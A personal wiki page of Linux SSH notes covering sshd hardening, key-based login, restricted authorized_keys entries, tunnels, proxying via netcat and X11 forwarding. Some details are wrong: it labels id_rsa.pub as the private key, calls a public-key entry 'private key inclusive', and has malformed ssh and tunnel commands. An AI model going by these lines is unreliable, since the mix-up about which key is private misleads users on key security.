Home tmade.de

Home Wiki

SSH

SSHD

Service config:

/etc/ssh/sshd_config
UseDNS no  #To avoid dns lookup edit /etc/ssh/sshd_conf and add the command

To deny password-authentification for non-root-users set the following options:

PasswordAuthentication no
PubkeyAuthentication yes
RSAAuthentication yes

To deny root login:

PermitRootLogin no

To allow root-login just for particular IP´s:

PermitRootLogin yes
AllowUsers root@10.6.3.100 root@10.6.3.101 root@10.6.3.102

To deny (additionally) password authentification (in combination with “PasswordAuthentication no”):

ChallengeResponseAuthentication no

Login

ssh -X -c 172.22.49.120            #
ssh -XCl stream 172.22.49.113      #Login with "X" on X-Terminal
ssh -l root suse10
ssh root@suse10                    #root = user, suse10 = host (or IP Adress)

SSH KEY-Authentication

Howto:

Generate private and public key (stored in ~/.ssh/) on the server_A

ssh-keygen -t rsa -b 4096                                                   #Generate "rsa" Keyfile. Note: there is also "dsa" encrytion

Created files:

id_rsa                                                                      #File location "/home/username/.ssh" or "/root/.ssh"

and

id_rsa.pub                                                                  #Private Key. File location "/home/username/.ssh" or "/root/.ssh"

To copy the authorized_keys (contains “id_rsa.pub”) to remoteHost (“/home/user/.ssh/authorized_keys”):

ssh-copy-id –i ~/.ssh/id_rsa.pub user@remoteHost

Note: “/home/user/.ssh/authorized_keys” will be created!


Copy the authorized_keys to remoteHost (explained in single manual steps):

Create a new file called

authorized_keys                                                             #Public Key. File location "/home/username/.ssh" or "/root/.ssh"

Copy the content of id_rsa.pub into authorized_keys (or append) with:

cat id_rsa.pub >> authorized_keys

Copy authorized_keys to server_B

scp authorized_keys root@IP:

On server_B copy content of authorized_keys (from server_A) to ~/.ssh

cat authorized_keys > ~/.ssh/authorized_keys

or

cat authorized_keys >> ~/.ssh/authorized_keys

Access server_B from server_A via SSH

ssh Server_B

or

ssh IP(server_B)

To copy the key at once:

ssh-copy-id –i ~/.ssh/id_rsa.pub user@remoteHost

Public Key from id_rsa

ssh-keygen -y -f ~/.ssh/id_rsa > ~/.ssh/id_rsa.pub

"authorized_keys"

To limit ssh-access to one host add the following code to the “authorized_keys” file:

from="testhost.domain.local",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty

Example entry (private key inclusive):

from="testhost.domain.local",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDyPW9iLLvMA4sfiDLDst6cLbrxQiw0xjFV+uZA+pnulcxotbyNzRDhi3PMjXce7V6WQSJ6izYFCN8Xv0w5HIju8BpPBob9d9VyU2wdFx+nCX3xFzlcquVUTR8WqzikbipLJF52nPLuemH5xBTZXgagnpX9ESZFhhYXol+MQuPC8+HW5xtCCN3+8D4K8GJiauL/0Uq0N9SfXK/0G8wBb28499F483ZnSm31DTTJq13iyiphtfwjqncW+H2mJKGoum8HoeQHx8ArfCtwelTKrXc7E/94ZFO/z7b0jPNXFH4jCZmq2/fjgwnO/nVPvfNbis4wxSomuihU7fA0ywxBferx root@testhost

SSH Authentication from Windows -> Linux

Create the key-files on a windows client with putty. Start “puttygen.exe” and generate the key.

The public and private key has to be saved to a folder.

Append the content of the public file to:

/home/user/.ssh/authorized_keys                                             #(via samba e.g.)

Note: always restart the sshd server:

/etc/init.d/sshd restart
rcsshd restart
service sshd restart

or other distributed way

ssh remote

# ----------------------------------------------------------
# Machine 1
# ----------------------------------------------------------

$ cat free_hosts
IP=testtesttest

# ----------------------------------------------------------
# Machine 2
# ----------------------------------------------------------

$ . <(ssh machine1 cat free_hosts); echo "$IP"
testtesttest
. <(ssh 192.168.64.131 cat /root/somefile); echo "$IP" 

ssh + script/ command

ssh user@IP sudo /scripts/linux_modify.sh   #Execute "/scripts/linux_modify.sh" on remote machine with non root priveleagues (sudo)
ssh user@IP /scripts/linux_modify.sh        #Execute "/scripts/linux_modify.sh" on remote machine 
ssh user@IP "sudo uname -a"                 #Execute command "uname -a" on remote machine with non root priveleagues (sudo)
ssh user@IP "uname -a"                      #Execute command "uname -a" on remote machine 

ssh-agent

ssh-agent -s                                #Start the agent
ssh-add ~/.ssh/id_rsa                       #Add the key (passphrase will be promted)

Script:

#!/bin/bash
ssh-agent -s && ssh-add ~/.ssh/id_rsa

ssh Tunnel

ssh -L 4242:suse10.site:110tmade@suse10.site		#user tmade forwards the connection comming in on port 4242 of his local host suse10 to port 110(POP3) on the remote host suse10 via ssh tunnel (port forwarding)

ssh over Proxy

ssh -o ProxyCommand="nc -X connect -x proxy_host_or_IP:port %h %p" username@hostname
ssh -o PORT=2022 -o ProxyCommand="nc -X connect -x proxy_host_or_IP:port %h %p" username@hostname              #with ssh port 2022

Hint: Package “netcat-openbsd” which contains the programm “nc” has to been installed!

X11

To run a X11-Programm with root, if root-login is not allowed:

  • Login with your normal user (don´t execute “sudo su -” during login)
  • xauth -f ~/.Xauthority extract /tmp/Xauthtmp :10
  • Start an external X-Server (such as Xming)
  • sudo su -
  • xauth merge /tmp/Xauthtmp
  • export DISPLAY=localhost:10.0
  • xclock (or another X-Programm)

Check ssh-config

sshd -t                       #command to check for syntax errors in your configuration file
sshd -T                       #output active directives
linux/ssh.txt · Last modified: 2021/10/18 09:04 by tmade
 
Except where otherwise noted, content on this wiki is licensed under the following license: CC Attribution-Noncommercial-Share Alike 4.0 International
Recent changes RSS feed Donate Powered by PHP Valid XHTML 1.0 Valid CSS Driven by DokuWiki